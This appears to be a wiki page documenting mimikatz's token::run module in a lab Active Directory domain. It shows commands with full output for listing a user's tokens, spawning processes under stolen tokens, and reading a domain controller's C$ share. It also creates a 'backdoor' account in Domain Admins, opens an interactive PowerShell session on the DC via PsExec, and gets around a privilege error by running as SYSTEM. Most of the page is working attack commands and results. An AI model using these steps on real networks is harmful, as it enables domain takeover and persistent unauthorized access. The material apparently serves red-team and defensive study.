
token::run executes a new process with its token.

It has the following command line arguments:

  • /id: Token id to use for the new process

  • /user: Execute the process with the tokens of this user (instead of specifying the token ID)..

  • /process: The process to run. By default, the command whoami is executed.


List tokens of user to impersonate using the token::list module:

mimikatz # token::list /user:ffast
Token Id  : 0
User name : ffast
SID name  :
5332    {0;000563b2} 2 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
4432    {0;000563b2} 2 F 2839551        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
668     {0;00050574} 0 D 329079         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (12g,24p)       Impersonation (Impersonation)
668     {0;000563e4} 2 L 353269         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
800     {0;000563e4} 2 L 456098         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
920     {0;000563e4} 2 L 380750         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
920     {0;000563e4} 2 L 387116         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,01p)       Impersonation (Identification)
920     {0;000563e4} 2 L 436160         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)


Run a command using a specified token by it's token ID. By default, the command whoami is executed:

mimikatz # token::run /id:457263
Token Id  : 457263
User name :
SID name  :

676     {0;000f0ac5} 3 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary


Run a command using a specified token by it's username. The domain name must not be specified. By default, the command whoami is executed:

mimikatz # token::run /user:ffast
Token Id  : 457263
User name :
SID name  :

676     {0;000f0ac5} 3 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary


Other processes to spawn can be specified.

Example to access DC system drive:

mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$"
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)
 Volume in drive \\dc1\c$ is Windows
 Volume Serial Number is 6A6C-0DE3

 Directory of \\dc1\c$

05/31/2023  06:30 AM    <DIR>          AzureData
05/31/2023  07:09 AM    <DIR>          ddns_server
05/31/2023  07:04 AM    <DIR>          inetpub
05/31/2023  06:46 AM    <DIR>          Packages
05/05/2023  11:31 AM    <DIR>          PerfLogs
05/31/2023  07:04 AM    <DIR>          Program Files
05/05/2023  12:26 PM    <DIR>          Program Files (x86)
05/31/2023  07:10 AM    <DIR>          terraform
05/31/2023  07:06 AM    <DIR>          Users
05/31/2023  07:05 AM    <DIR>          Windows
05/31/2023  06:33 AM    <DIR>          WindowsAzure
05/31/2023  07:07 AM    <DIR>          WSUS
               0 File(s)              0 bytes
              12 Dir(s)  15,918,473,216 bytes free

Add backdoor user:

mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain"
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
The request will be processed at a domain controller for domain winattacklab.local.

The command completed successfully.

The request will be processed at a domain controller for domain winattacklab.local.

The command completed successfully.

The request will be processed at a domain controller for domain winattacklab.local.

User name                    backdoor
Full Name
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2023 3:59:27 PM
Password expires             Never
Password changeable          6/20/2023 3:59:27 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

It's not possible to directly start a new interactive PowerShell process, because the user input of a new process is somehow not handled correctly. However, when PowerShell is started via PsExec, it can be interactively used:

mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe"
Token Id  : 77132228
User name :
SID name  :

8544    {0;0498f042} 2 L 77132228       child\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (14g,05p)       Primary

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals -

A new PowerShell window is then opened wich can be used interactively:

PS C:\Windows\system32> whoami

S C:\Windows\system32> Enter-PSSession DC1
[DC1]: PS C:\Users\ffast\Documents> hostname
[DC1]: PS C:\Users\ffast\Documents> whoami
[DC1]: PS C:\Users\ffast\Documents> ls \

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/31/2023   6:30 AM                AzureData
d-----        5/31/2023   7:09 AM                ddns_server
d-----        5/31/2023   7:04 AM                inetpub
d-----        5/31/2023   6:46 AM                Packages
d-----         5/5/2023  11:31 AM                PerfLogs
d-r---        5/31/2023   7:04 AM                Program Files
d-----         5/5/2023  12:26 PM                Program Files (x86)
d-----        5/31/2023   7:10 AM                terraform
d-r---        6/22/2023   1:02 PM                Users
d-r---        6/20/2023   5:27 PM                Windows
d-----        5/31/2023   6:33 AM                WindowsAzure
d-----        5/31/2023   7:07 AM                WSUS

Demystifying the kull_m_process_run_data Error

Even as a local administrator, you can get the kull_m_process_run_data error:

mimikatz # token::run /id:1075487 /process:whoami.exe
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
  • The error message says that the CreateProcessAsUser function could not be executed.

The token::run command uses the function CreateProceasAsUser to create a new process in the security context of the specified token and requires the following privileges (source: CreateProcessAsUserA function (processthreadsapi.h)):

  • SeIncreaseQuotaPrivilege privilege

  • SeAssignPrimaryTokenPrivilege privilege (if the token is not assignable)

A local admin has the permission to get the SeIncreaseQuotaPrivilege privilege but not the SeAssignPrimaryTokenPrivilege privilege:

mimikatz # privilege::name SeIncreaseQuotaPrivilege
Privilege '5' OK

mimikatz # privilege::name SeAssignPrimaryTokenPrivilege
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (3) c0000061

If you start mimikatz as SYSTEM, these privileges can be acquired:

mimikatz # privilege::name SeIncreaseQuotaPrivilege
Privilege '5' OK

mimikatz # privilege::name SeAssignPrimaryTokenPrivilege
Privilege '3' OK

Then, it's possible to use the token::run command and use stolen tokens as primary tokens.

Last updated